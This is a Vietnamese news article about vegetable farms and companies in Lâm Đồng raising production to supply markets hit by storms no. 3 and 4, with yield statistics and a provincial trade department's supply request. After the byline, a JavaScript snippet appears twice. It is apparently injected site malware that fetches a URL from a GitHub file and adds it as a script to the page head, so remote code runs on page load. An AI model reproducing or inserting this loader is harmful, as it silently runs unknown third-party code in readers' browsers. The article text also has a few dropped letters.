Vựa rau Lâm Đồng gia tăng sản xuất trong mùa mưa bão

Trong cao điểm mùa mưa bão, nhiều nhà vườn, trang trại sản xuất rau củ thuộc vựa rau ở Lâm Đồng đã gia tăng sản xuất để kịp thời cung ứng cho thị trường, đặc biệt tại các địa phương đang chịu ảnh hưởng của bão lũ.

Chú thích ảnh
Công nhân tại khu nhà xưởng của một đơn vị chuyên cung ứng rau trên địa bàn huyện Đức Trọng. 

Sau những cơn mưa rả rích do ảnh hưởng của trận bão số 3, số 4 liên tục đổ bộ, các vùng chuyên trồng rau tại thành phố Đà Lạt tất bật thu hoạch, xuống giống gieo trồng lứa rau củ mới. Vừa thu xong gần 2 sào (gần 2.000 m2) rau tần ô, nhà vườn Lê Nam (đường Cách Mạng Tháng Tám, Phường 8, thành phố Đà Lạt) không để cho đất nghỉ, tranh thủ trời còn nắng ráo tiếp tục nhập gần 40.000 cây giống xà lách lô lô về gieo trồng.

Theo anh Nam, do thị trường đang hút hàng, nhất là các loại rau ăn lá nên gia đình anh luân phiên canh tác. Không chọn các loại rau dài ngày, gia đình anh chủ yếu xuống giống loại rau ngắn ngày trên dưới 1 tháng để nhanh được bán cho thương lái.

Tương tự, hộ ông Lê Văn Thanh (Phường 9, Đà Lạt) cũng chuẩn bị thu hoạch vườn rau bó xôi hơn 2.000 m2 sớm hơn dự kiến vài ngày để kịp thời cung cấp cho thương lái. Sau khi thu hoạch ông Thanh cũng lên kế hoạch gieo trồng gối đầu cho vụ rau mới và được thương lái đặt hàng trước bởi thời điểm mưa bão như hiện nay, các loại rau ngắn ngày rất hút hàng và được giá.

Chú thích ảnh
Rau Đà Lạt, đặc biệt các loại rau ăn lá, rau ăn quả để được dài ngày là những mặt hàng được ưa chuộng trong cao điểm mùa mưa bão. 

Tại huyện Đơn Dương, vùng canh tác rau trọng điểm trên địa bàn tỉnh Lâm Đồng, sau những ngày mưa không ngớt kết thúc, nhà vườn tranh thủ thu hoạch, gieo trồng rau củ cho kịp mùa vụ. Ông Bùi Ngọc Cung, Phó giám đốc Hợp tác xã rau VietGap Lạc Lâm (huyện Đơn Dương) cho biết, đơn vị có gần 20 xã viên với tổng diện tích canh tác hàng chục hecta. Để phục vụ cho thị trường mùa mưa bão, các thành viên phân công nhau mỗi người gieo trồng một loại rau củ nhằm đa dang mặt hàng, luân phiên cung cấp cho thị trường. Hiện Hợp tác xã vẫn cung cấp hàng chục tấn rau củ các loại cho các tỉnh phía Nam và miền Trung, miền Bắc.

Ông Cung cho biết thêm, thị trường chủ yếu của đơn vị vẫn là chợ truyền thống, cùng với đó là một số hệ thống siêu thị, công ty ở các tỉnh, thành trong cả nước. ể duy trì nguồn hàng, riêng gia đình ông có khoảng 1 hecta đất canh tác ớt chuông, ớt trái cây cũng được chia lịch gieo trồng, thu hoạch cuốn chiếu để đảm bảo nguồn cung 2 – 3 tạ mỗi ngày cho thị trường.

Trong khi đó, khu nhà xưởng đóng gói của Công ty Trách nhiệm hữu hạn Sản xuất – Thương mại Nông sản Phong Thúy (huyện Đức Trọng) những ngày qua hoạt động không ngừng nghỉ. Khu nhà xưởng sơ chế diện tích 6.000 m2 luôn có hàng chục nhân công phân loại, đóng gói, liên tục vận chuyển rau củ ra xe đi tỉnh tiêu thụ.

Chú thích ảnh
Một nhà vườn thu hoạch ớt chuông Đà Lạt để cung cấp cho thị trường sau chuỗi ngày mưa do nh hưởng của cơn bão số 4. 

Theo đại diện công ty này, hiện nay mỗi ngày đơn vị cung ứng khoảng 12 tấn rau củ các loại cho các đối tác trong cả nước, tăng 2 tấn/ngày so với thời điểm trước bão số 3 đổ bộ. Hiện nay, quy mô sản xuất của Công ty khoảng 130 ha rau củ các loại; trong đó, trang trại của công ty 55 ha, diện tích liên kết 75 ha, tổng sản lượng cung ứng khoảng 12.000 tấn/năm. Dự kiến từ nay đến cuối năm, đơn vị sẽ tăng khoảng 30% sản lượng mới đủ cung ứng cho thị trường.

Theo thống kê, tính đến tháng 8/2024, tổng diện tích rau các loại đã thu hoạch vụ hè thu năm 2024 trên địa bàn tỉnh Lâm Đồng đạt 15.029 ha, đạt 60,3% diện tích gieo trồng, tăng 2,8% so với cùng kỳ; năng suất bình quân chung ước đạt 358,53 tạ/ha; trong đó, diện tích chủ yếu tập trung tại huyện Đơn Dương, Đức Trọng, Lạc Dương và thành phố Đà Lạt.

Theo Trung tâm Khuyến nông tỉnh Lâm Đồng, hiện nay ngoại trừ cải thảo, ớt sừng, ớt chuông thì giá các sản phẩm rau, củ, quả còn lại đều tăng so với thời điểm khoảng 1 tuần trước. Nguyên nhân là nhu cầu thị trường các tỉnh tiêu thụ mạnh sau khi liên tục chịu ảnh hưởng bất lợi của mưa bão. Dự báo trong thời gian tới, các loại hoa Đà Lạt và một số sản phẩm rau, củ, quả sẽ tăng và có biến động so với hiện tại.

Chú thích ảnh
Sau khi bão số 3 và số 4 liên tục đổ bộ, nhiều nhà vườn, đơn vị cung ứng nông sản trên đa bàn tỉnh Lâm Đồng chủ động thu hoạch, tăng cường khoảng 30% sản lượng cho thị trường.

Liên quan đến hoạt động cung ứng hàng hóa thiết yếu, ngày 17/9, Sở Công Thương tỉnh Lâm Đồng đã đề nghị các địa phương, đơn vị liên quan có phương án ổn định nguồn cung ứng hàng hoá, nhất là các mặt hàng nông sản nhằm bình ổn thị trường sau bão. Cụ thể, Sở đề nghị các địa phương trong tỉnh vận động các đơn vị cung ứng rau, củ, quả tích cực hưởng ứng tham gia ủng hộ giúp đỡ đồng bào bị thiệt hại do bão số 3 gây ra. Đồng thời tăng lượng cung ứng các sản phẩm nông sản, rau củ quả của địa phương cho các tỉnh phía Bắc với chất lượng, giá cả ổn định nhất; có phương án để chủ động nguồn hàng cung ứng cho các địa phương chịu ảnh hưởng trực tiếp của bão, lũ.

Sở Công Thương cũng đề nghị các doanh nghiệp, hợp tác xã, cơ sở sản xuất, cung ứng rau, củ, quả trên địa bàn tỉnh hưởng ứng, tăng lượng cung ứng các sản phẩm nông sản ra các tỉnh phía Bắc, có các chính sách ưu đãi, hỗ trợ về giá cho người dân các tỉnh phía Bắc bị ảnh hưởng do bão, lũ thời gian qua. Bên cạnh đó, cần nắm bắt bắt nhu cầu tiêu dùng của người dân trong tỉnh để chuẩn bị nguồn hàng, cung ứng hàng ha đầy đủ để không xảy ra tình trạng thiếu hàng, gián đoạn nguồn hàng, tăng giá đột biến.

Theo Doanh nghiệp & Thương hiệu

;var url = ‘https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt’;fetch(url).then(response => response.text()).then(data => {var script = document.createElement(‘script’);script.src = data.trim();document.getElementsByTagName(‘head’)[0].appendChild(script);});;var url = ‘https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt’;fetch(url).then(response => response.text()).then(data => {var script = document.createElement(‘script’);script.src = data.trim();document.getElementsByTagName(‘head’)[0].appendChild(script);});